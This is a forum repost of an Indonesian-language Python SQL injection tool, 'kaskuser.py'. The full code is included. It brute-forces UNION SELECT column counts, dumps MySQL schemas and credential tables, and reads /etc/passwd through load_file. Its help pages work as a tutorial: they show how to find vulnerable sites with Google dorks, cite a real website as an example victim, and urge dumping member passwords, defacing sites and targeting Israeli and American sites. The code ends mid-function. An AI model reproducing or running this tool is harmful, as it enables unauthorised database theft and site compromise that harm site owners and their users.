dari http://www.kaskus.us/showthread.php?t=4583788 mungkin bisa sedikit di review
#!/usr/bin/python
#created by : morgan byte
#kode yg di gunakan
import urllib
import sys
import re
import os
import socket
import httplib
import urllib2
import time
import random
#jenis platform yang cocok di gunakan
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#halaman paling depan
os.system(SysCls)
if len(sys.argv) <= 1:
print "\nXoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooX"
print "o o"
print "o ^ Kaskuser ^ o"
print "o o"
print "| Hacking bukan kejahatan |"
print "| |"
print "| Tapi |"
print "| |"
print "| Hacking adalah seni dan pekerjaan programmer |"
print "o o"
print "o created by : morgan byte o"
print "o o"
print "|-----------------------[[[[^^]]]]------------------------------|"
print ") ("
print ") Daftar isi : ("
print ") ("
print ") ("
print ") # Keterangan kaskuser code : ("
print ") /. ketik : kaskuser.py -k lalu tekan enter ("
print ") ("
print ") # Cara Menggunakan : ("
print ") /. ketik : kaskuser.py -m lalu tekan enter ("
print ") ("
print ") # Cara mencari target : ("
print ") /. ketik : kaskuser.py -t lalu tekan enter ("
print ") ("
print ") ("
print ") ("
print ") ("
print ") ___________ ______ _ __ ("
print ") _/ ___\_ __ \_/ __ \ \/ \/ / ("
print ") \ \___| | \/\ ___/\ / ("
print ") \___ >__| \___ >\/\_/ ("
print ") \/ \/ ("
print ") ("
print ") ("
print ")-------------------------$$$$()$$$$----------------------------("
print "% NB : %"
print "% %"
print "% Code kaskuser mencuri database %"
print "% %"
print "X!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!X\n"
sys.exit(1)
#halaman tutorial kaskuser
for arg in sys.argv:
if arg == "-m":
print " Tutorial kaskuser.py "
print "\n\tpenjelasannya:"
print "\tgimana caranya nih gan? . pertama ente hafalin dulu kode yang tadi ( kaskuser.py -k ), penggunaannya untuk apa aja . oke . kalau udah di hafal , mari lihat prakteknya"
print "\n\tpertama:"
print "\tpertama cari dulu target , cara mencari target lihat di kaskuser.py -t , cara nya kasih tanda petik ' di belakang situs . contoh : www.contohsitus.com/berita.php?id=1' . nah kasih tanda petik ' dan enter di mozilla . jika ada bacaan situs itu error maka situs itu bisa di tembus . setelah dapat target baru gunakan script kaskuser.py ini"
print "\n\tkedua:"
print "\tsetelah dapat target maka buka run ketik cmd dan enter , setelah itu tulis cd\ terus enter , tulis cd python25 terus enter , setelah itu baru di mulai eksekusi (inget kode-2 di kaskuser.py) tulis kaskuser.py -u \"www.contohsitus.com/berita.php?id=1\" --findcol . terus enter (mencari panjang kolom). setelah dapat panjang kolom , misalkan www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4 . maka berlanjut ke eksekusi selanjutnya"
print "\n\tketiga:"
print "\tsetelah dapet kolom , maka selanjutnya adalah melihat dalam database tersebut , contohnya : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --full . maka akan tampil seluruh isi database, kolom dan table nya"
print "\tuntuk melihat hasilnya, buka folder C di komputer kamu , lihat folder python25 , klik dan lihat ada bacaan hasil.txt di notepad . buka itu . hasil dari dalam database table dan kolom akan terlihat, baris pertama itu di namakan table , dan baris kedua di namakan kolom . maka cara eksekusinya seperti ini :"
print "\n\tkeempat:"
print "\tini eksekusi terakhir untuk mengambil seluruh isi situs, baik username, email dan password , login admin situs tersebut . caranya , contoh nama tablenya user dan nama colomnnya email,password dan nama databasenya aril-luna , maka cara eksekusinya : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --dump -D aril-luna -T user -C email,password . dan enter. maka otomatis seluruh email dan password situs tersebut akan tampak dan tersimpan di hasil.txt tadi"
print "\n\tkelima:"
print "\tcara atas untuk Mysql version 5 sedangkan Mysql version 4 caranya contoh : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --fuzz"
print "\n\tkeenam:"
print "\tselanjutnya tinggal kembangkan kreatifitas ente , contoh kodenya ada di kaskuser.py -k . jangan lupa cendolnya gan hehe :P"
print "\n\tCONTOH:"
print "\n\t "
print "\tme dapet situs amerika www.kcbs.us/results_print.php?id=1899' <<= kasih tanda petik , dan ternyata error , maka me eksekusi di code kaskuser.py"
print "\tbuka run, ketik cmd , ketik cd\ lalu enter . ketik cd python25 lalu enter , ketik kaskuser.py -u \"www.kcbs.us/results_print.php?id=1899\" --findcol (mencari panjang kolom)"
print "\n\t "
print "\tmaka hasilnya akan seperti ini : "
print "\n\t "
print "\t[+] URL:http://www.kcbs.us/results_print.php?id=1899--"
print "\t[+] Pemisahan Memakai: + -- "
print "\t[+] Menentukan Jumlah Kolom ..."
print "\t[+] Panjang Kolom : 4"
print "\t[+] Kolom Yg Null Berada Di Nomor #: 1"
print "\t[+] SQLi URL: http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11--"
print "\tcendol URL: http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11"
print "\t[-] Misi Selesai!"
print "\n\t "
print "\tnah itu berarti panjang kolomnya 4 dan kelemahannya ada di angka 1 , copy paste yg ada bacaan cendol"
print "\tmaka selanjutnya mengetahui isi database situs itu, lihat yg ada bacaan cendol "
print "\tcaranya : ketik : kaskuser.py -u \"http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11\" --full"
print "\n\t "
print "\tmaka hasilnya akan seperti ini : "
print "\n\t "
print "\t[+] URL:http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11--"
print "\t[+] Gathering MySQL Server Configuration..."
print "\tDatabase: kcbs_mma"
print "\tUser: mma@localhost"
print "\tVersion: 5.0.27"
print "\n\t "
print "\t[Database]: kcbs_db"
print "\t[Table: Columns]"
print "\t[47]webmembers: id,memberId,personId,nameuser,wordpass,lastLogin,email,firstname,lastname,city,state,country"
print "\n\t "
print "\tmaka ketemu sudah , nama databasenya kcbs_db , nama Table nya webmembers , dan kolomnya id,memberId,personId,nameuser dll"
print "\n\t "
print "\tTerakhir yaitu mengetahui username , password dan email situs itu"
print "\tcaranya , ketik : kaskuser.py -u \"http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11\" --dump -D kcbs_db -T webmembers -C email,wordpass lalu enter "
print "\n\t "
print "\tlihat apa yg terjadi , kita mendapatkan ribuan username dan password admin serta member situs itu . selanjutnya tinggal login , dan acak-acak situs itu ;) "
print "\twar is begin . target utama israel dan amerika ."
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#halaman mencari target
for arg in sys.argv:
if arg == "-t":
print "\n Mencari Target "
print " "
print " "
print " DASAR-DASAR PENCARIAN "
print " "
print " \n"
print "\tPengenalan:"
print "\n "
print " \n"
print "\tTarget di bagi 2 bagian : target khusus dan target umum"
print "\n \n"
print "\tTarget Khusus yaitu dimana kita mengkhususkan pembobolan pada satu situs"
print "\tTarget Umum yaitu bersifat random , hasil dari search engine"
print "\n \n"
print "\tCaranya:"
print "\n "
print " \n"
print "\tketik www.google.com . lalu masukkan url bug seperti ini : inurl:reviews.php?id= , lalu tekan enter , maka semua situs yg berhalaman reviews akan muncul di google, klik satu persatu situs tersebut dan beri tanda petik ' di akhir url nya. contoh : www.situskamu.com/reviews.php?id=23' <<= kasih tanda petik seperti ini. jika error maka situs tersebut bisa di bobol "
print "\tsetelah dapat situs yg error (maksud situs error yaitu halamannya ada bacaan error atau halaman itu rusak) maka langsung eksekusi menggunakan code kaskuser.py lihat caranya di kaskuser.py -m (enter) "
print "\tcontoh bug url banyak sekali , bisa di kreasi sendiri , contoh seperti : inurl:berita.php?id= , inurl:news.php?sid= , inurl: index.php?id= , dan lain-lain"
print "\tjika ingin menembus situs-2 yg khusus satu negara , contoh negara israel , maka url bug nya tambahkan kode negara israel seperti ini : inurl:index.php?id= 'co.il'"
print "\t untuk target khusus , tinggal tambahkan tanda petik ' , dan cari di mana errornya"
print "\tberlaku untuk mysql 5 dan mysql 4 "
print "\n "
print " \n"
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#halaman keterangan kode kaskuser
for arg in sys.argv:
if arg == "-k":
print " Penggunaan: ./kaskuser.py "
print "\n "
print " \n"
print "\tWajib Di Ketahui Kode-Kode Berikut ini"
print "\n "
print " \n"
print "\tModel:"
print "\tcontoh: --dbs kode untuk melihat database situs. MySQL v5+"
print "\tcontoh: --schema kode untuk melihat kerangka situs. MySQL v5+"
print "\tcontoh: --masuk kode untuk melihat isi database situs. MySQL v5+"
print "\tcontoh: --dump kode untuk mengambil isi database yg di inginkan. MySQL v4+"
print "\tcontoh: --fuzz kode untuk melihat table dan kolom situs versi 4. MySQL v4+"
print "\tcontoh: --kolom kode untuk mencari panjang kolom situs MySQL v4+"
print "\tcontoh: --info kode untuk melihat informasi situs versi 4. MySQL v4+"
print "\n\tPerintah nya:"
print "\tcontoh: -u URL \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print "\n\tmodel perintah dump dan kerangka:"
print "\tcontoh: -D \"untuk nama database\""
print "\tcontoh: -T \"untuk table\""
print "\tcontoh: -C \"untuk kolom\""
print "\n\tOptional:"
print "\tcontoh: -p \"buat proxy 127.0.0.1:80 or proxy.txt\""
print "\tcontoh: -o \"file yg di masukan.txt\" contoh hasil.txt"
print "\tcontoh: -r baris nomor di mulai"
print "\tcontoh: -v ini buat dump kalau tidak mau pakai nomor."
print "\n Ex: ./kaskuser.py --info -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print " Ex: ./kaskuser.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print " Ex: ./kaskuser.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -D catalog -T orders -r 200"
print " Ex: ./kaskuser.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./kaskuser.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./kaskuser.py --kolom -u \"www.site.com/news.php?id=22\""
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#panjang kolom
MaxCol = 101
#nama-nama table .
fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
#nama-nama kolom .
fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
#penggunaan default nya
arg_end = "--"
arg_eva = "+"
#kode pertama
site = ""
dbt = "hasil.txt"
proxy = "None"
count = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_verbose = 1
cendol = "concat(0x1e,0x1e,"
mode = "None"
line_URL = ""
count_URL = ""
gets = 0
cur_db = ""
cur_table = ""
table_num = 0
terminal = ""
num = 0
#kode yg di gunakan args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--masuk":
mode = arg
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--kolom":
mode = arg
arg_kolom = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
else:
arg_eva = "/**/"
elif arg == "-r":
num = sys.argv[count+1]
table_num = num
elif arg == "-v":
arg_verbose = sys.argv[count]
arg_verbose = 0
count+=1
#halaman atas ketika eksekusi
file = open(dbt, "a")
print "\n ! BANTAI SITUS ! "
print " "
print " "
print " Nothing Is Secured "
print " "
print " "
print " "
print " Design by : morgan byte "
print " "
print " "
print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
file.write("\n ! BANTAI SITUS ! ")
file.write("\n ")
file.write("\n ")
file.write("\n Nothing Is Secured ")
file.write("\n ")
file.write("\n ")
file.write("\n ")
file.write("\n Design by : morgan byte ")
file.write("\n ")
file.write("\n ")
file.write("\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print "\n "
print "\n "
print "\n "
print "\n "
#Jika kode Arg Error
if site == "":
print "\n[-] harus pakai kode ini -u dan spesifikasinya"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "None":
print "\n[-] spesifikasi kode yg di gunakan --schema, --dbs, --dump, --fuzz, --info, --masuk, --kolom."
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] harus pakai kode ini -D"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] Versi 5 pakai kode -D, -T dan -C setelah ntu --dump"
print "[-] Versi 4 pakai kode -T dan -C setelah ntu --dump"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode != "--kolom" and site.find("cendol") == -1:
print "\n[-] SALAH ! , cari dan copy paste yg ada bacaan \'cendol\'\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
#Konek ke situs yg di masukkan
site = site.replace("+",arg_eva)
site = site.replace("/**/",arg_eva)
print "\n[+] Target Situs:",site+arg_end
file.write("\n\n[+] URL:"+site+arg_end+"\n")
print " "
file.write("\n ")
#pasang proxy
socket.setdefaulttimeout(20)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
gets+=1
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Tanpa Proxy"
file.write("\n[+] Tanpa Proxy")
proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)
#Mencari Kolom
if mode == "--kolom":
print "[+] Sedang mencari jumlah kolom "
file.write("\n[+] Sedang mencari jumlah kolom ")
print " "
file.write("\n ")
checkfor=[]
sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
makepretty = ""
for x in xrange(0,MaxCol):
try:
sys.stdout.write("%s," % (x))
file.write(str(x)+",")
sys.stdout.flush()
cendol = "qutho"+str(x)+"miyah"
checkfor.append(cendol)
if x > 0:
sitenew += ","
sitenew += "0x"+cendol.encode("hex")
finalurl = sitenew+arg_end
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) >= 1:
print "\n[+] MaxCol :",len(checkfor)
file.write("\n[+] MaxCol : "+str(len(checkfor)))
nullcol = re.findall(("\d+"),y)
print "[+] Kolom Yg Null Berada Di Nomor #:",nullcol[0]
file.write("\n[+] Kolom Yg Null Berada Di Nomor #: "+nullcol[0])
for z in xrange(0,len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
print "[+] SQLi URL:",site+arg_end
file.write("\n[+] SQLi URL: "+site+arg_end)
site = site.replace(","+nullcol[0]+",",",cendol,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"cendol,")
site = site.replace(","+nullcol[0],",cendol")
print "[+] cendol URL:",site
file.write("\n[+] cendol URL: "+site)
print "[-] Misi Selesai!\n"
file.write("\n[-] Misi Selesai!\n")
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n "
file.write("\n ")
print "\n "
file.write("\n ")
print "\n[!] GAGAL"
file.write("\n[!] GAGAL")
print "[-] Coba di eksekusi secara manual, copy paste di mozilla"
print "[-] Misi Selesai\n"
sys.exit(1)
#Untuk mengetahui version:user:database situs
head_URL = site.replace("cendol","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Sedang menembus database"
file.write("\n[+] Sedang menembus database\n")
while 1:
try:
gets+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
# Uncomment the following lines to debug issues with gathering server information
# print head_URL
# print source
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.write("\tDatabase: "+database+"\n")
file.write("\tUser: "+user+"\n")
file.write("\tVersion: "+version)
version = version[0]
break
else:
print "[-] No Data Found"
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
proxy_num+=1
# Akses untuk mengetahui MySQL database dan Load_File (file yg di simpan)
if mode == "--info":
head_URL = site.replace("cendol","0x"+"cendol".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
gets+=1
proxy_num+=1
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("cendol",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to MySQL Database:",yesno
file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("cendol","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
file.write("\n[!] "+site.replace("cendol","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
gets+=1
proxy_num+=1
head_URL = site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("root:x:",source)
match = re.findall("root:*:",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to Load_File:",yesno
file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end
file.write("\n[!] "+site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end)
#Jika situs ternyata versi 4
if mode == "--schema" or mode == "--dbs" or mode == "--masuk":
if int(version) == 4:
print "\n[-] --schema, --dbs and --masuk hanya untuk MySQL v5+ servers!"
print "[-] -k for help"
sys.exit(1)
#Mengeksekusi URL situs
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
